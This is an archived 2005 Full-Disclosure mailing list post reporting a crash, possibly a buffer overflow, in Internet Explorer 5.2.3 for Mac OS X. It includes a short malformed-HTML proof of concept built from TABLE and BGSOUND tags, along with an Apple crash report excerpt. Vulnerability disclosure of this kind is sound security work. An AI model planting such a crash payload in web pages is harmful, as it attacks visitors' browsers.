[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
From: "Marco Mella" <marco.mella@xxxxxxxxxxxxxxxx>
Date: Thu, 22 Sep 2005 14:03:02 +0200

Microsoft IE 5.2.3 is the last IE browser released for Mac OSX. IE 5.2.3 contain a vulnerability that allow a remote attacker to crash the browser an potetially remote code execution.

A remote attacker could setup a malicious site and entice a victim to
visit it triggering the buffer overflow.

Exploit tested on Tiger and Panther.

Sample of POC (save on file and open with IE to test locally) ------------------------------------------------------------------------ --------- Begin code------

<HTML> <HEAD>
<TABLE
><BGSOUND
about:file"" SRC=about:""
>

End of code-------


Apple Crash Report
---------------------------
OS Version:     10.4.2 (Build 8C46)
Report Version: 3

Command: Internet Explorer Path: /Applications/Internet Explorer.app/Contents/MacOS/Internet Explorer Parent: WindowServer [65]

Version:        5.2.3 (5.2.3)
Build Version:  30
Project Name:   MicrosoftIE5
Source Version: 58150100

PID:    854
Thread: 7

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x000002e4

Thread 0:
0   libSystem.B.dylib                  0x9000a778 mach_msg_trap + 8
1   libSystem.B.dylib                  0x9000a6bc mach_msg + 60
2   ...ple.CoreServices.CarbonCore     0x90b661e4 SwitchContexts + 96
3   ...ple.CoreServices.CarbonCore     0x90b5be90 YieldToThread + 372
.....
snip----

Regards,
Marco


--------------------------------------------------------------------

CONFIDENTIALITY NOTICE

This message and its attachments are addressed solely to the persons above and 
may contain confidential information. If you have received the message in 
error, be informed that any use of the content hereof is prohibited. Please 
return it immediately to the sender and delete the message. Should you have any 
questions, please contact us by replying to webmaster@xxxxxxxxxxxxxxxxx

       Thank you

                                       www.telecomitalia.it

--------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
  - From: Marco Mella

Prev by Date: [Full-disclosure] Av, spyware, ddl trojan assesment
Next by Date: Re: [Full-disclosure] Av, spyware, ddl trojan assesment
Previous by thread: [Full-disclosure] [SECURITY] [DSA 816-1] New XFree86 packages fix arbitrary code execution
Next by thread: Re: [Full-disclosure] Microsoft IE 5.2.3 for Mac OSX crash
Index(es):
- Date
- Thread